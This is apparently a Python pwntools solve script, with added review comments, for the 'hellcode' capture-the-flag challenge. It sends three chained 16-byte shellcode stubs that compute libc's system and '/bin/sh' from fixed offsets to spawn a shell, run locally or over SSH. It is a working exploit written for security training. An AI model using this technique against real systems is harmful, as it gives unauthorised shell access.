  1. from pwn import *
  2.  
  3. import time
  4.  
  5. import sys
  6.  
def hellcode(DEBUG):
    """Drive the three-stage solve script for the 'hellcode' challenge.

    DEBUG selects the target: "1" runs ./hellcode locally and pauses so a
    debugger can be attached, "2" runs the challenge binary over SSH on
    shell.angstromctf.com.  The nested stage functions share the process
    handle ``r`` and the address constants through this closure.

    NOTE(review): there is no else branch, so any other DEBUG value leaves
    ``r`` unbound and stage1() fails with NameError.  The file is Python 2
    (print statement, raw_input, str-typed payloads); it does not run
    unchanged on Python 3.
    """
    # Address each 16-byte stub hands control back to (per the author's
    # comments below) so the next stub can be entered.
    code_runner = 0x400996
    # Presumably libc offsets used to turn a known mprotect pointer into
    # system and "/bin/sh" without a leak -- only valid for the target's
    # libc build; TODO confirm against that libc.
    offset_mprotect = 0x0000000000101770
    offset_system = 0x0000000000045390
    offset_str_bin_sh = 0x18cd57

    if DEBUG=="1":
        t = 0.005  # NOTE(review): assigned but never read
        r = process("./hellcode")
        raw_input("debug?")  # block until the operator attaches a debugger
    elif DEBUG=="2":
        # Credentials are placeholders on this page.
        s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXX')
        r = s.process('/problems/hellcode/hellcode')

    def a(s):
        """Assemble the amd64/Linux instruction string *s* and return its bytes."""
        return asm(s, arch = "amd64", os = 'linux')

    def stage1():
        # save r14 = mprotect+7
        # r15 = code_runner
        # return code_runner
        #
        # Author's plan for the first stub: the value popped into rbx is
        # presumably 0x400B47 (the sub below turns it into code_runner), rcx is
        # presumed to hold mprotect+7 on entry, and one of the two pushed
        # copies of rbx stays on the stack for the return -- TODO confirm
        # against the binary.
        log.info('stage 1')
        r.recvuntil("Please enter your code: ")
        payload = a('pop rbx')
        payload += a('sub bx, %d' % (0x400B47 - code_runner)) # 0x400996 (code_runner)
        payload += a('push rcx')
        payload += a('pop r14') # r14 = mprotect+7
        payload += a('push rbx')
        payload += a('push rbx')
        payload += a('pop r15') # r15 = 0x400996 (code_runner)
        # NOP-pad to exactly 0x10 bytes.  A negative repeat count yields '',
        # so an oversized stub would be sent unpadded rather than truncated.
        payload += "\x90"*(0x10-len(payload))
        r.send(payload)

    def stage2():
        # change r14 from mprotect+7 to system
        # r13 = system
        # return code_runner
        log.info('stage 2')
        r.recvuntil("Please enter your code: ")
        payload = a('pop rax') # trash
        payload += a('push r15') # code_runner
        # (mprotect+7) - ((mprotect+7) - system) == system: the libc base
        # cancels out, which is why no leak is needed when the offsets match.
        payload += a('sub r14, %d' % (offset_mprotect+7 - offset_system)) # r14 = system
        payload += a('push r14')
        payload += a('pop r13') # r13 = system
        # Same 16-byte NOP padding as stage1.
        payload += "\x90"*(0x10-len(payload))
        r.send(payload)

    def stage3():
        # change r13 to /bin/sh
        # return system (r14)
        log.info('stage 3')
        r.recvuntil("Please enter your code: ")
        payload = ''
        # system + (str_bin_sh - system) == address of "/bin/sh" in libc.
        payload += a('add r13, %d' % (offset_str_bin_sh - offset_system)) # r13 = /bin/sh
        payload += a('push r13')
        payload += a('pop rdi') # rdi = /bin/sh
        payload += a('push r14') # system
        # Same 16-byte NOP padding as stage1.
        payload += "\x90"*(0x10-len(payload))
        r.send(payload)

    def leak():
        """Alternative path that reads a pointer back instead of trusting fixed offsets.

        Never called (the call below is commented out).  NOTE(review):
        puts_plt and libc_start_main_got are assigned but never read; the
        GOT address is repeated as a literal in the mov.  Whether the 6
        received bytes are a libc pointer is inferred from the names only.
        """
        puts_plt = 0x4007A0
        libc_start_main_got = 0x602048
        r.recvuntil("Please enter your code: ")
        payload = a('pop rbx')
        payload += a('sub bx, 0xd9')
        payload += a('push rbx')
        payload += a('mov rdi, 0x602048')
        payload += "\x90"*(0x10-len(payload))
        r.send(payload)
        res = r.recv(6)
        # Python 2 print statement: zero-pad the 6 bytes to 8 and decode with pwntools u64.
        print hex(u64(res.ljust(8,"\x00"))) # same local

    stage1()
    stage2()
    stage3()
    # leak()

    # Hand the connection to the operator once the stages have been sent.
    r.interactive()
  166.  
  167.  
  168.  
# Script entry: the first CLI argument selects the target ("1" local, "2" remote).
hellcode(sys.argv[1])